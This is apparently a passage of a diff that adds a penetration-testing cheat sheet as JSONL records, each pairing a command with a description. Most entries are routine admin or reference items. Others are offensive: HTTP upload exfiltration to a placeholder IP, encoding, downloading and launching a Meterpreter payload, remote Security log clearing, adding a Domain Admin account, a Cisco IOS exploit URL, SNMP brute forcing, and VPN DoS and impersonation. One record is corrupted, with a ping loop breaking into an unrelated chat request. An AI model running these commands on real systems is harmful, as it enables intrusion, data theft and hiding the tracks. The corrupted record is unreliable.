{"category": "PowerShell", "command": "Get-Process | Select-Object -ExpandProperty Name", "description": "Returns only process names"}
|
| 416 |
+
{"category": "PowerShell", "command": "Get-Help * -Parameter Credential", "description": "Cmdlets that take credentials"}
|
| 417 |
+
{"category": "PowerShell", "command": "Get-WmiObject -List *network*", "description": "Available WMI network commands"}
|
| 418 |
+
{"category": "PowerShell", "command": "[System.Net.DNS]::GetHostEntry(\"ip\")", "description": "DNS lookup"}
|
| 419 |
+
{"category": "PowerShell", "command": "Get-EventLog -List", "description": "List event logs"}
|
| 420 |
+
{"category": "PowerShell", "command": "Clear-EventLog -LogName Application,Security -ComputerName SVR01", "description": "Clear Security & Application event logs for remote server"}
|
| 421 |
+
{"category": "PowerShell", "command": "Get-WmiObject -Class Win32_OperatingSystem | Select-Object -Property * | Export-Csv c:\\os.csv", "description": "Export OS info to CSV file"}
|
| 422 |
+
{"category": "PowerShell", "command": "Get-Service | Where-Object {$_.Status -eq \"Running\"}", "description": "List running services"}
|
| 423 |
+
{"category": "PowerShell", "command": "New-PSDrive -Persist -PSProvider FileSystem -Root \\\\1.1.1.1\\tools -Name i", "description": "Persistent PSDrive to remote file share"}
|
| 424 |
+
{"category": "PowerShell", "command": "Get-ChildItem -Path c:\\ -Force -Recurse -Filter *.log -ErrorAction SilentlyContinue | Where-Object {$_.LastWriteTime -gt \"2012-08-20\"}", "description": "Return files with write date past 8/20/2012"}
|
| 425 |
+
{"category": "PowerShell", "command": "(New-Object System.Net.WebClient).DownloadFile(\"url\",\"dest\")", "description": "File download over HTTP"}
|
| 426 |
+
{"category": "PowerShell", "command": "$ports=(80,443,445); $ip=\"x.x.x.x\"; foreach ($port in $ports) { try { $socket = New-Object System.Net.Sockets.TcpClient($ip,$port); } catch {}; if ($socket -eq $null) { echo \"$ip`:$port - Closed\"; } else { echo \"$ip`:$port - Open\"; $socket = $null; } }", "description": "TCP port scanner"}
|
| 427 |
+
{"category": "PowerShell", "command": "$ping = New-Object System.Net.NetworkInformation.Ping; $ping.Send(\"ip\",500)", "description": "Ping with 500ms timeout"}
|
| 428 |
+
{"category": "PowerShell", "command": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass; $Host.UI.PromptForCredential(\"title\",\"message\",\"user\",\"domain\")", "description": "Basic authentication popup"}
|
| 429 |
+
{"category": "PowerShell", "command": "powershell.exe -Command \"do { if ((Get-Date -Format yyyyMMdd-HHmm) -match '201308(0[8-9]|[0-1][0-1])-(0[8-9]|[0-1][0-7])[0-5][0-9]') { Start-Process -WindowStyle Hidden 'C:\\Temp\\my.exe'; Start-Sleep -s 14400 } } while(1)\"", "description": "Run EXE every 4 hours between Aug 8-11, 2013, 0800-1700"}
|
| 430 |
+
{"category": "PowerShell", "command": "$pw = ConvertTo-SecureString -String \"PASSWORD\" -AsPlainText -Force; $pp = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"DOMAIN\\user\",$pw; Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process file.exe -verb runas}'", "description": "PowerShell RunAs"}
|
| 431 |
+
{"category": "PowerShell", "command": "powershell.exe Send-MailMessage -To \"email\" -From \"email\" -Subject \"Subject\" -Attachments \"attachment_file_path\" -Body \"Body\" -SmtpServer \"Target_Email_Server_IP\"", "description": "Email sender"}
|
| 432 |
+
{"category": "PowerShell", "command": "net time \\\\ip; at \\\\ip time \"Powershell -Command 'Enable-PSRemoting -Force'\"; at \\\\ip time+1 \"Powershell -Command 'Set-Item wsman:\\localhost\\client\\trustedhosts *'\"; at \\\\ip time+2 \"Powershell -Command 'Restart-Service WinRM'\"; Enter-PSSession -ComputerName ip -Credential username", "description": "Turn on PowerShell remoting"}
|
| 433 |
+
{"category": "PowerShell", "command": "Get-WmiObject -ComputerName DC -Namespace root\\MicrosoftDNS -Class MicrosoftDNS_ResourceRecord -Filter \"domainname='DOMAIN'\" | Select-Object TextRepresentation", "description": "List hostname and IP for domain computers"}
|
| 434 |
+
{"category": "PowerShell", "command": "powershell.exe -NoProfile -NonInteractive -Command \"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $source='https://YOUR_SPECIFIED_IP/file.zip'; $destination='C:\\master.zip'; $http = New-Object System.Net.WebClient; $http.DownloadFile($source, $destination);\"", "description": "Download file from specified location"}
|
| 435 |
+
{"category": "PowerShell", "command": "powershell.exe -NoProfile -NonInteractive -Command \"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $server='http://YOUR_SPECIFIED_IP/folder'; $filepath='C:\\master.zip'; $http = New-Object System.Net.WebClient; $http.UploadFile($server,$filepath);\"", "description": "Data exfiltration via HTTP POST"}
|
| 436 |
+
{"category": "PowerShell", "command": "Get-ADUser -Filter * -Properties *", "description": "List all Active Directory users (requires RSAT)"}
|
| 437 |
+
{"category": "PowerShell", "command": "Invoke-WebRequest -Uri \"url\" -Method Get", "description": "Perform HTTP request"}
|
| 438 |
+
{"category": "PowerShell", "command": "Get-NetFirewallRule", "description": "List Windows firewall rules"}
|
| 439 |
+
{"category": "PowerShell Meterpreter", "command": "$contents = Get-Content audit.ps1; $ms = New-Object IO.MemoryStream; $action = [IO.Compression.CompressionMode]::Compress; $cs = New-Object IO.Compression.DeflateStream($ms,$action); $sw = New-Object IO.StreamWriter($cs, [Text.Encoding]::ASCII); $contents | ForEach-Object {$sw.WriteLine($_)}; $sw.Close(); $code = [Convert]::ToBase64String($ms.ToArray()); $command = \"Invoke-Expression '$(New-Object IO.StreamReader($(New-Object IO.Compression.DeflateStream($(New-Object IO.MemoryStream(,[Convert]::FromBase64String('$code'))),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd();\"; $bytes = [System.Text.Encoding]::Unicode.GetBytes($command); $encodedCommand = [Convert]::ToBase64String($bytes); Write-Host $encodedCommand", "description": "encodeMeterpreter.ps1 to compress and encode Meterpreter payload"}
|
| 440 |
+
{"category": "PowerShell Meterpreter", "command": "powershell.exe -NoExit -EncodedCommand [encoded_Meterpreter_string]", "description": "Launch encoded Meterpreter on target (x86)"}
|
| 441 |
+
{"category": "PowerShell Meterpreter", "command": "powershell -NoProfile -NonInteractive -Command \"& {$client = New-Object System.Net.WebClient; $client.DownloadFile('http://1.1.1.1/shell.txt', 'c:\\windows\\temp\\shell.txt')}\"", "description": "Download Meterpreter shellcode"}
|
| 442 |
+
{"category": "PowerShell Meterpreter", "command": "powershell -NoProfile -NonInteractive -NoExit -Command \"& {$cmd = Get-Content 'c:\\windows\\temp\\shell.txt'; powershell -NoProfile -NonInteractive -NoExit -EncodedCommand $cmd}\"", "description": "Execute downloaded Meterpreter shellcode"}
|
| 443 |
+
{"category": "Windows Registry", "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "description": "OS information"}
|
| 444 |
+
{"category": "Windows Registry", "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion /v ProductName", "description": "Product name"}
|
| 445 |
+
{"category": "Windows Registry", "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion /v InstallDate", "description": "Date of install"}
|
| 446 |
+
{"category": "Windows Registry", "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion /v RegisteredOwner", "description": "Registered owner"}
|
| 447 |
+
{"category": "Windows Registry", "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion /v SystemRoot", "description": "System root"}
|
| 448 |
+
{"category": "Windows Registry", "command": "HKLM\\System\\CurrentControlSet\\Control\\TimeZoneInformation /v ActiveTimeBias", "description": "Time zone (offset in minutes from UTC)"}
|
| 449 |
+
{"category": "Windows Registry", "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Map Network Drive MRU", "description": "Mapped network drives"}
|
| 450 |
+
{"category": "Windows Registry", "command": "HKLM\\System\\MountedDevices", "description": "Mounted devices"}
|
| 451 |
+
{"category": "Windows Registry", "command": "HKLM\\System\\CurrentControlSet\\Enum\\USBStor", "description": "USB devices"}
|
| 452 |
+
{"category": "Windows Registry", "command": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters /v IPEnableRouter=1", "description": "Turn on IP forwarding"}
|
| 453 |
+
{"category": "Windows Registry", "command": "HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets", "description": "LSA secrets (VPN, autologon, passwords)"}
|
| 454 |
+
{"category": "Windows Registry", "command": "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v autoadminlogon", "description": "Auto admin logon"}
|
| 455 |
+
{"category": "Windows Registry", "command": "HKLM\\Security\\Policy\\PolAdtEv", "description": "Audit policy"}
|
| 456 |
+
{"category": "Windows Registry", "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Services", "description": "Kernel/user services"}
|
| 457 |
+
{"category": "Windows Registry", "command": "HKLM\\Software", "description": "Installed software on machine"}
|
| 458 |
+
{"category": "Windows Registry", "command": "HKCU\\Software", "description": "Installed software for user"}
|
| 459 |
+
{"category": "Windows Registry", "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs", "description": "Recent documents"}
|
| 460 |
+
{"category": "Windows Registry", "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\LastVisitedMRU", "description": "Recent user locations"}
|
| 461 |
+
{"category": "Windows Registry", "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\OpenSaveMRU", "description": "Recent user locations"}
|
| 462 |
+
{"category": "Windows Registry", "command": "HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs", "description": "Typed URLs"}
|
| 463 |
+
{"category": "Windows Registry", "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU", "description": "MRU lists"}
|
| 464 |
+
{"category": "Windows Registry", "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Applets\\RegEdit /v LastKey", "description": "Last registry key accessed"}
|
| 465 |
+
{"category": "Windows Registry", "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "description": "Startup location (Run)"}
|
| 466 |
+
{"category": "Windows Registry", "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", "description": "Startup location (RunOnce)"}
|
| 467 |
+
{"category": "Windows Registry", "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", "description": "Startup location (Policies)"}
|
| 468 |
+
{"category": "Windows Registry", "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "description": "Startup location (User Run)"}
|
| 469 |
+
{"category": "Windows Registry", "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", "description": "Startup location (User RunOnce)"}
|
| 470 |
+
{"category": "Windows Registry", "command": "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows /v Load", "description": "Startup location (Load)"}
|
| 471 |
+
{"category": "Windows Registry", "command": "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows /v Run", "description": "Startup location (Run)"}
|
| 472 |
+
{"category": "Enumerating Windows Domain", "command": "dsquery user -limit 0", "description": "List users on domain with no limit"}
|
| 473 |
+
{"category": "Enumerating Windows Domain", "command": "dsquery group \"cn=users,dc=victim,dc=com\"", "description": "List groups for domain=victim.com"}
|
| 474 |
+
{"category": "Enumerating Windows Domain", "command": "dsquery group -name \"domain admins\" | dsget group -members -expand", "description": "List domain admin accounts"}
|
| 475 |
+
{"category": "Enumerating Windows Domain", "command": "dsquery user -name bob | dsget user -memberof -expand", "description": "List all groups for a user"}
|
| 476 |
+
{"category": "Enumerating Windows Domain", "command": "dsquery user -name bob | dsget user -samid", "description": "Get a user's login ID"}
|
| 477 |
+
{"category": "Enumerating Windows Domain", "command": "dsquery user -inactive 2", "description": "List accounts inactive for 2 weeks"}
|
| 478 |
+
{"category": "Enumerating Windows Domain", "command": "dsadd user \"CN=Bob,CN=Users,DC=victim,DC=com\" -samid bob -pwd bobpass -display \"Bob\" -pwdneverexpires yes -memberof \"CN=Domain Admins,CN=Users,DC=victim,DC=com\"", "description": "Add domain user"}
|
| 479 |
+
{"category": "Enumerating Windows Domain", "command": "dsrm -subtree -noprompt \"CN=Bob,CN=Users,DC=victim,DC=com\"", "description": "Delete user"}
|
| 480 |
+
{"category": "Enumerating Windows Domain", "command": "dsquery * \"DC=victim,DC=com\" -scope subtree -attr cn operatingSystem operatingSystemServicePack -filter \"(&(objectClass=computer)(objectCategory=computer)(operatingSystem=Windows*))\"", "description": "List all operating systems on domain"}
|
| 481 |
+
{"category": "Enumerating Windows Domain", "command": "dsquery site -o rdn -limit 0", "description": "List all site names"}
|
| 482 |
+
{"category": "Enumerating Windows Domain", "command": "dsquery subnet -site sitename -o rdn", "description": "List all subnets within a site"}
|
| 483 |
+
{"category": "Enumerating Windows Domain", "command": "dsquery server -site sitename -o rdn", "description": "List all servers within a site"}
|
| 484 |
+
{"category": "Enumerating Windows Domain", "command": "dsquery * domainroot -filter \"(&(objectCategory=Computer)(objectClass=Computer)(operatingSystem=*Server*))\" -limit 0", "description": "Find servers in the domain"}
|
| 485 |
+
{"category": "Enumerating Windows Domain", "command": "dsquery * \"CN=Sites,CN=Configuration,DC=forestRootDomain\" -filter \"(objectCategory=Server)\"", "description": "List domain controllers per site"}
|
| 486 |
+
{"category": "Windows Scripting", "command": "for /L %i in (10,1,254) do @for /L %x in (10,1,254) do @ping -n 1 -wSo I need to merge all the JSONL files into a single file. Could you please combine the following JSONL files into one, using the artifact_id from the first file:"}
|
| 487 |
+
{"category": "Common Ports", "command": "21", "description": "FTP"}
|
| 488 |
+
{"category": "Common Ports", "command": "22", "description": "SSH"}
|
| 489 |
+
{"category": "Common Ports", "command": "23", "description": "Telnet"}
|
| 490 |
+
{"category": "Common Ports", "command": "25", "description": "SMTP"}
|
| 491 |
+
{"category": "Common Ports", "command": "49", "description": "TACACS"}
|
| 492 |
+
{"category": "Common Ports", "command": "53", "description": "DNS"}
|
| 493 |
+
{"category": "Common Ports", "command": "67/68", "description": "DHCP (UDP)"}
|
| 494 |
+
{"category": "Common Ports", "command": "69", "description": "TFTP (UDP)"}
|
| 495 |
+
{"category": "Common Ports", "command": "80", "description": "HTTP"}
|
| 496 |
+
{"category": "Common Ports", "command": "88", "description": "Kerberos"}
|
| 497 |
+
{"category": "Common Ports", "command": "110", "description": "POP3"}
|
| 498 |
+
{"category": "Common Ports", "command": "111", "description": "RPC"}
|
| 499 |
+
{"category": "Common Ports", "command": "123", "description": "NTP (UDP)"}
|
| 500 |
+
{"category": "Common Ports", "command": "135", "description": "Windows RPC"}
|
| 501 |
+
{"category": "Common Ports", "command": "137", "description": "NetBIOS"}
|
| 502 |
+
{"category": "Common Ports", "command": "138", "description": "NetBIOS"}
|
| 503 |
+
{"category": "Common Ports", "command": "139", "description": "SMB"}
|
| 504 |
+
{"category": "Common Ports", "command": "143", "description": "IMAP"}
|
| 505 |
+
{"category": "Common Ports", "command": "161", "description": "SNMP (UDP)"}
|
| 506 |
+
{"category": "Common Ports", "command": "179", "description": "BGP"}
|
| 507 |
+
{"category": "Common Ports", "command": "201", "description": "AppleTalk"}
|
| 508 |
+
{"category": "Common Ports", "command": "389", "description": "LDAP"}
|
| 509 |
+
{"category": "Common Ports", "command": "443", "description": "HTTPS"}
|
| 510 |
+
{"category": "Common Ports", "command": "445", "description": "SMB"}
|
| 511 |
+
{"category": "Common Ports", "command": "500", "description": "ISAKMP (UDP)"}
|
| 512 |
+
{"category": "Common Ports", "command": "514", "description": "Syslog"}
|
| 513 |
+
{"category": "Common Ports", "command": "520", "description": "RIP"}
|
| 514 |
+
{"category": "Common Ports", "command": "546/547", "description": "DHCPv6"}
|
| 515 |
+
{"category": "Common Ports", "command": "587", "description": "SMTP"}
|
| 516 |
+
{"category": "Common Ports", "command": "902", "description": "VMware"}
|
| 517 |
+
{"category": "Common Ports", "command": "1080", "description": "Socks Proxy"}
|
| 518 |
+
{"category": "Common Ports", "command": "1194", "description": "VPN"}
|
| 519 |
+
{"category": "Common Ports", "command": "1433/1434", "description": "MS-SQL"}
|
| 520 |
+
{"category": "Common Ports", "command": "1521", "description": "Oracle"}
|
| 521 |
+
{"category": "Common Ports", "command": "1629", "description": "DameWare"}
|
| 522 |
+
{"category": "Common Ports", "command": "2049", "description": "NFS"}
|
| 523 |
+
{"category": "Common Ports", "command": "3128", "description": "Squid Proxy"}
|
| 524 |
+
{"category": "Common Ports", "command": "3306", "description": "MySQL"}
|
| 525 |
+
{"category": "Common Ports", "command": "3389", "description": "RDP"}
|
| 526 |
+
{"category": "Common Ports", "command": "5060", "description": "SIP"}
|
| 527 |
+
{"category": "Common Ports", "command": "5222", "description": "Jabber"}
|
| 528 |
+
{"category": "Common Ports", "command": "5432", "description": "PostgreSQL"}
|
| 529 |
+
{"category": "Common Ports", "command": "5666", "description": "Nagios"}
|
| 530 |
+
{"category": "Common Ports", "command": "5900", "description": "VNC"}
|
| 531 |
+
{"category": "Common Ports", "command": "6000", "description": "X11"}
|
| 532 |
+
{"category": "Common Ports", "command": "6129", "description": "DameWare"}
|
| 533 |
+
{"category": "Common Ports", "command": "6667", "description": "IRC"}
|
| 534 |
+
{"category": "Common Ports", "command": "8000", "description": "Common HTTP alternative"}
|
| 535 |
+
{"category": "Common Ports", "command": "8080", "description": "Common HTTP proxy"}
|
| 536 |
+
{"category": "Common Ports", "command": "8443", "description": "HTTPS alternative"}
|
| 537 |
+
{"category": "Common Ports", "command": "9000", "description": "Common web server port"}
|
| 538 |
+
{"category": "Common Ports", "command": "9001", "description": "Tor / HSQL"}
|
| 539 |
+
{"category": "Common Ports", "command": "9090/9091", "description": "Openfire"}
|
| 540 |
+
{"category": "Common Ports", "command": "9100", "description": "JetDirect"}
|
| 541 |
+
{"category": "Networking", "command": "Windows: 128", "description": "TTL fingerprint for Windows"}
|
| 542 |
+
{"category": "Networking", "command": "Linux: 64", "description": "TTL fingerprint for Linux"}
|
| 543 |
+
{"category": "Networking", "command": "Network: 255", "description": "TTL fingerprint for Network devices"}
|
| 544 |
+
{"category": "Networking", "command": "Solaris: 255", "description": "TTL fingerprint for Solaris"}
|
| 545 |
+
{"category": "Networking", "command": "A: 0.0.0.0 - 127.255.255.255", "description": "Class A IP range"}
|
| 546 |
+
{"category": "Networking", "command": "B: 128.0.0.0 - 191.255.255.255", "description": "Class B IP range"}
|
| 547 |
+
{"category": "Networking", "command": "C: 192.0.0.0 - 223.255.255.255", "description": "Class C IP range"}
|
| 548 |
+
{"category": "Networking", "command": "D: 224.0.0.0 - 239.255.255.255", "description": "Class D IP range (Multicast)"}
|
| 549 |
+
{"category": "Networking", "command": "E: 240.0.0.0 - 255.255.255.255", "description": "Class E IP range (Reserved)"}
|
| 550 |
+
{"category": "Networking", "command": "10.0.0.0 - 10.255.255.255", "description": "Reserved private range (Class A)"}
|
| 551 |
+
{"category": "Networking", "command": "127.0.0.0 - 127.255.255.255", "description": "Reserved loopback range"}
|
| 552 |
+
{"category": "Networking", "command": "172.16.0.0 - 172.31.255.255", "description": "Reserved private range (Class B)"}
|
| 553 |
+
{"category": "Networking", "command": "192.168.0.0 - 192.168.255.255", "description": "Reserved private range (Class C)"}
|
| 554 |
+
{"category": "Networking", "command": "/31: 255.255.255.254 (1 Host)", "description": "Subnet mask and host count"}
|
| 555 |
+
{"category": "Networking", "command": "/30: 255.255.255.252 (2 Hosts)", "description": "Subnet mask and host count"}
|
| 556 |
+
{"category": "Networking", "command": "/29: 255.255.255.248 (6 Hosts)", "description": "Subnet mask and host count"}
|
| 557 |
+
{"category": "Networking", "command": "/28: 255.255.255.240 (14 Hosts)", "description": "Subnet mask and host count"}
|
| 558 |
+
{"category": "Networking", "command": "/27: 255.255.255.224 (30 Hosts)", "description": "Subnet mask and host count"}
|
| 559 |
+
{"category": "Networking", "command": "/26: 255.255.255.192 (62 Hosts)", "description": "Subnet mask and host count"}
|
| 560 |
+
{"category": "Networking", "command": "/25: 255.255.255.128 (126 Hosts)", "description": "Subnet mask and host count"}
|
| 561 |
+
{"category": "Networking", "command": "/24: 255.255.255.0 (254 Hosts)", "description": "Subnet mask and host count"}
|
| 562 |
+
{"category": "Networking", "command": "/23: 255.255.254.0 (510 Hosts)", "description": "Subnet mask and host count"}
|
| 563 |
+
{"category": "Networking", "command": "/22: 255.255.252.0 (1022 Hosts)", "description": "Subnet mask and host count"}
|
| 564 |
+
{"category": "Networking", "command": "/21: 255.255.248.0 (2046 Hosts)", "description": "Subnet mask and host count"}
|
| 565 |
+
{"category": "Networking", "command": "/20: 255.255.240.0 (4094 Hosts)", "description": "Subnet mask and host count"}
|
| 566 |
+
{"category": "Networking", "command": "/19: 255.255.224.0 (8190 Hosts)", "description": "Subnet mask and host count"}
|
| 567 |
+
{"category": "Networking", "command": "/18: 255.255.192.0 (16382 Hosts)", "description": "Subnet mask and host count"}
|
| 568 |
+
{"category": "Networking", "command": "/17: 255.255.128.0 (32766 Hosts)", "description": "Subnet mask and host count"}
|
| 569 |
+
{"category": "Networking", "command": "/16: 255.255.0.0 (65534 Hosts)", "description": "Subnet mask and host count"}
|
| 570 |
+
{"category": "Networking", "command": "/15: 255.254.0.0 (131070 Hosts)", "description": "Subnet mask and host count"}
|
| 571 |
+
{"category": "Networking", "command": "/14: 255.252.0.0 (262142 Hosts)", "description": "Subnet mask and host count"}
|
| 572 |
+
{"category": "Networking", "command": "/13: 255.248.0.0 (524286 Hosts)", "description": "Subnet mask and host count"}
|
| 573 |
+
{"category": "Networking", "command": "/12: 255.240.0.0 (1048574 Hosts)", "description": "Subnet mask and host count"}
|
| 574 |
+
{"category": "Networking", "command": "/11: 255.224.0.0 (2097150 Hosts)", "description": "Subnet mask and host count"}
|
| 575 |
+
{"category": "Networking", "command": "/10: 255.192.0.0 (4194302 Hosts)", "description": "Subnet mask and host count"}
|
| 576 |
+
{"category": "Networking", "command": "/9: 255.128.0.0 (8388606 Hosts)", "description": "Subnet mask and host count"}
|
| 577 |
+
{"category": "Networking", "command": "/8: 255.0.0.0 (16777214 Hosts)", "description": "Subnet mask and host count"}
|
| 578 |
+
{"category": "Networking", "command": "Given: 1.1.1.101/28; Netmask: 255.255.255.240; Range: 1.1.1.96 - 1.1.1.111", "description": "Calculate subnet range"}
|
| 579 |
+
{"category": "Networking", "command": "ff02::1", "description": "IPv6 broadcast: link-local nodes"}
|
| 580 |
+
{"category": "Networking", "command": "ff05::1", "description": "IPv6 broadcast: site-local nodes"}
|
| 581 |
+
{"category": "Networking", "command": "ff01::2", "description": "IPv6 broadcast: node-local routers"}
|
| 582 |
+
{"category": "Networking", "command": "ff02::2", "description": "IPv6 broadcast: link-local routers"}
|
| 583 |
+
{"category": "Networking", "command": "ff05::2", "description": "IPv6 broadcast: site-local routers"}
|
| 584 |
+
{"category": "Networking", "command": "fe80::", "description": "IPv6 interface: link-local"}
|
| 585 |
+
{"category": "Networking", "command": "2001::", "description": "IPv6 interface: routable"}
|
| 586 |
+
{"category": "Networking", "command": "::a.b.c.d", "description": "IPv6 interface: IPv4 compatible"}
|
| 587 |
+
{"category": "Networking", "command": "::ffff:a.b.c.d", "description": "IPv6 interface: IPv4 mapped"}
|
| 588 |
+
{"category": "IPv6 Tools", "command": "rsmurf6 eth0 remote_ipv6", "description": "THC IPv6 Toolkit: Remote Network DoS"}
|
| 589 |
+
{"category": "IPv6 Tools", "command": "socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[2001::]:80", "description": "SOCAT tunnel IPv6 through IPv4"}
|
| 590 |
+
{"category": "IPv6 Tools", "command": "./nikto.pl -host 127.0.0.1 -port 8080", "description": "Scan tunneled IPv6 host with Nikto"}
|
| 591 |
+
{"category": "CISCO Commands", "command": "configure terminal", "description": "Enter global configuration mode"}
|
| 592 |
+
{"category": "CISCO Commands", "command": "(config)#interface fa0/0", "description": "Configure FastEthernet 0/0"}
|
| 593 |
+
{"category": "CISCO Commands", "command": "(config-if)#ip address 1.1.1.1 255.255.255.0", "description": "Add IP to fa0/0"}
|
| 594 |
+
{"category": "CISCO Commands", "command": "(config)#line vty 0 4", "description": "Configure VTY lines"}
|
| 595 |
+
{"category": "CISCO Commands", "command": "(config-line)#login", "description": "Enable login for VTY"}
|
| 596 |
+
{"category": "CISCO Commands", "command": "(config-line)#password password", "description": "Set VTY password"}
|
| 597 |
+
{"category": "CISCO Commands", "command": "show sessions", "description": "Display open sessions"}
|
| 598 |
+
{"category": "CISCO Commands", "command": "show version", "description": "Display IOS version"}
|
| 599 |
+
{"category": "CISCO Commands", "command": "dir file systems", "description": "List available files"}
|
| 600 |
+
{"category": "CISCO Commands", "command": "dir all-filesystems", "description": "List file information"}
|
| 601 |
+
{"category": "CISCO Commands", "command": "dir /all", "description": "List deleted files"}
|
| 602 |
+
{"category": "CISCO Commands", "command": "show running-config", "description": "Display config loaded in memory"}
|
| 603 |
+
{"category": "CISCO Commands", "command": "show startup-config", "description": "Display config loaded at boot"}
|
| 604 |
+
{"category": "CISCO Commands", "command": "show ip interface brief", "description": "Display interface summary"}
|
| 605 |
+
{"category": "CISCO Commands", "command": "show interface e0", "description": "Display detailed interface info"}
|
| 606 |
+
{"category": "CISCO Commands", "command": "show ip route", "description": "Display routes"}
|
| 607 |
+
{"category": "CISCO Commands", "command": "show access-lists", "description": "Display access lists"}
|
| 608 |
+
{"category": "CISCO Commands", "command": "terminal length 0", "description": "No limit on output"}
|
| 609 |
+
{"category": "CISCO Commands", "command": "copy running-config startup-config", "description": "Save running config to startup"}
|
| 610 |
+
{"category": "CISCO Commands", "command": "copy running-config tftp", "description": "Copy running config to TFTP server"}
|
| 611 |
+
{"category": "CISCO Commands", "command": "http://ip/level/16-99/exec/show/config", "description": "Exploit Cisco IOS 11.2-12.2 vulnerability"}
|
| 612 |
+
{"category": "SNMP", "command": "./snmpblow.pl -s srcip -d rtr_ip -t attackerip -f out.txt snmpstrings.txt", "description": "SNMP brute force with snmpblow.pl"}
|
| 613 |
+
{"category": "SNMP", "command": "snmpwalk -c public -v1 ip .1 | grep hrSWRunName | cut -d\" \" -f4", "description": "List Windows running services"}
|
| 614 |
+
{"category": "SNMP", "command": "snmpwalk -c public -v1 ip .1 | grep tcpConnState | cut -d\" \" -f6 | sort -u", "description": "List Windows open TCP ports"}
|
| 615 |
+
{"category": "SNMP", "command": "snmpwalk -c public -v1 ip .1 | grep hrSWInstalledName", "description": "List Windows installed software"}
|
| 616 |
+
{"category": "SNMP", "command": "snmpwalk -c public -v1 ip 1.3 | grep --.1.2.25 | cut -d\" \" -f4", "description": "List Windows users"}
|
| 617 |
+
{"category": "Packet Capturing", "command": "tcpdump -nvvX -s0 -i eth0 tcp portrange 22-23", "description": "Capture TCP traffic on ports 22-23"}
|
| 618 |
+
{"category": "Packet Capturing", "command": "tcpdump -i eth0 -tttt dst ip and not net 1.1.1.0/24", "description": "Capture traffic to IP excluding subnet"}
|
| 619 |
+
{"category": "Packet Capturing", "command": "tcpdump net 192.1.1.0/24", "description": "Capture traffic between local 192.1.1.0/24"}
|
| 620 |
+
{"category": "Packet Capturing", "command": "dumpcap -i eth0 -a duration:sec -w file.pcap", "description": "Capture traffic for specified seconds"}
|
| 621 |
+
{"category": "Packet Capturing", "command": "file2cable -i eth0 -f file.pcap", "description": "Replay PCAP file"}
|
| 622 |
+
{"category": "Packet Capturing", "command": "tcpreplay --topspeed --loop=0 --intf=eth0 pcap_file_to_replay", "description": "Replay packets (possible DoS)"}
|
| 623 |
+
{"category": "DNS", "command": "./dnsrecon.rb -t rvs -i 192.1.1.1,192.1.1.20", "description": "Reverse lookup for IP range"}
|
| 624 |
+
{"category": "DNS", "command": "./dnsrecon.rb -t std -d domain.com", "description": "Retrieve standard DNS records"}
|
| 625 |
+
{"category": "DNS", "command": "./dnsrecon.rb -t brt -d domain.com -w hosts.txt", "description": "Enumerate subdomains"}
|
| 626 |
+
{"category": "DNS", "command": "./dnsrecon -d domain.com -t axfr", "description": "DNS zone transfer"}
|
| 627 |
+
{"category": "DNS", "command": "nmap -R -sL -Pn -dns-servers dns_svr_ip range | awk '{if(($1\" \"$2\" \"$3)==\"Nmap scan report\") print $5\" \"$6}' | sed 's/(//g' | sed 's/)//g' > dns.txt", "description": "Nmap reverse DNS lookup and output parser"}
|
| 628 |
+
{"category": "VPN", "command": "ike-scan -M -A vpn_ip -P file", "description": "Write PSK to file"}
|
| 629 |
+
{"category": "VPN", "command": "ike-scan -A -t 1 --sourceip=spoof_ip dst_ip", "description": "DoS VPN server"}
|
| 630 |
+
{"category": "VPN", "command": "if (ip.proto == UDP && udp.src == 500) { kill(); drop(); msg(\"UDP packet dropped!\"); }", "description": "Ettercap filter to drop IPSEC traffic (UDP 500)"}
|
| 631 |
+
{"category": "VPN", "command": "etterfilter udpdrop.filter -o udpdrop.ef", "description": "Compile Ettercap filter"}
|
| 632 |
+
{"category": "VPN", "command": "ettercap -T -q -M arp -F udpdrop.ef // //", "description": "Start Ettercap to drop IPSEC traffic"}
|
| 633 |
+
{"category": "VPN", "command": "echo 1 > /proc/sys/net/ipv4/ip_forward", "description": "Enable IP forwarding"}
|
| 634 |
+
{"category": "VPN", "command": "iptables -t nat -A PREROUTING -p udp -i eth0 -d VPN_Server_IP -j DNAT --to Attacking_Host_IP; iptables -P FORWARD ACCEPT", "description": "Configure iptables for port forwarding to Fiked"}
|
| 635 |
+
{"category": "VPN", "command": "fiked -g vpn_gateway_ip -k VPN_Group_Name:Group_Pre-Shared_Key", "description": "Start Fiked to impersonate VPN server"}
|
| 636 |
+
